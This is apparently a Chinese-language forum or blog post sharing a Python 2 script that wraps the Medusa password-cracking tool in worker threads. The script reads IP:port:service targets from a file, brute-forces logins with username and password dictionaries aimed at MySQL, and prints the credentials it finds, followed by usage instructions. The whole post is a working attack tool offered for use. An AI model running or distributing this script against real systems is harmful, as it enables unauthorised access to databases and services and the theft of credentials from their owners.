python 封装的 medusa 的多线程版本

admin

代码如下：

1. #!/usr/bin/env python
   
2. # -*- coding: utf-8 -*-
   
3. # auto crack with medusa
   
4. # piaca
   
5. 
   
6. import os
   
7. import sys
   
8. import Queue
   
9. import threading
   
10. import subprocess
    
11. 
    
12. class Medusa(threading.Thread):
    
13. 
    
14.     def __init__(self, host_queue):
    
15.         threading.Thread.__init__(self)
    
16.         self.medusa_script = "/usr/bin/medusa"
    
17.         self.user_dict = "mysql_user.txt"
    
18.         self.pass_dict = "mysql_pass.txt"
    
19.         self.host_queue = host_queue
    
20.         self.timeout = 600
    
21.         self.lock = threading.Lock()
    
22. 
    
23.     def run(self):
    
24.         while True:
    
25.             if self.host_queue.qsize() > 0:
    
26.                 self.host = self.host_queue.get()
    
27.                 self.crack(self.host)
    
28.             else:
    
29.                 break
    
30. 
    
31.     def crack(self, host):
    
32.         self.host, self.port, self.module = host.split(":")
    
33.         self.command = [self.medusa_script, "-h", self.host, "-n", self.port, "-U", self.user_dict, "-P", self.pass_dict, "-e", "ns" ,"-M", self.module, "-f", "-v", "4"]
    
34. 
    
35.         self.proc = subprocess.Popen(self.command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    
36.         self.pid = self.proc.pid
    
37. 
    
38.         if self.timeout:
    
39.             self.timer = threading.Timer(self.timeout, self.ontimeout, (host,))
    
40.             self.timer.start()
    
41. 
    
42.         self.ret = self.proc.stdout.readlines()
    
43.         if len(self.ret) == 3:
    
44.             if "SUCCESS" in self.ret[2]:
    
45.                 self.lock.acquire()
    
46.                 print self.host, self.port, self.ret[2]
    
47.                 self.lock.release()
    
48.         stdmsg, errmsg = self.proc.communicate()
    
49.         self.timer.cancel()
    
50. 
    
51.     def ontimeout(self, host):
    
52.         if self.proc is not None:
    
53.             self.timer.cancel()
    
54.             self.lock.acquire()
    
55.             print "medusa will be stopped because of crack [%s] time out." % host
    
56.             self.lock.release()
    
57.             self.proc.terminate()
    
58.             self.proc.kill()
    
59.             self.proc.wait()
    
60. 
    
61. if __name__=='__main__':
    
62. 
    
63.     if len(sys.argv) != 3:
    
64.         print "error"
    
65.         sys.exit(1)
    
66. 
    
67.     host_file = sys.argv[1]
    
68.     num_works = int(sys.argv[2])
    
69.     host_queue = Queue.Queue(0)
    
70. 
    
71.     hosts = open(host_file, "r").readlines()
    
72. 
    
73.     for host in hosts:
    
74.         host = host.strip()
    
75.         if host != "":
    
76.             host_queue.put(host)
    
77. 
    
78.     medusa_threads = []
    
79.     for x in range(num_works):
    
80.         medusa_threads.append(Medusa(host_queue))
    
81.      
    
82.     for medusa_thread in medusa_threads:
    
83.         medusa_thread.start()
    
84.      
    
85.     for medusa_thread in medusa_threads:
    
86.         medusa_thread.join()
    

复制代码

具体用法是：

python medusa.py target.txt 20

target.txt 是含有目标 IP、端口和需要破解服务的文件，每行一个目标，冒号作为分隔符；
20 是线程数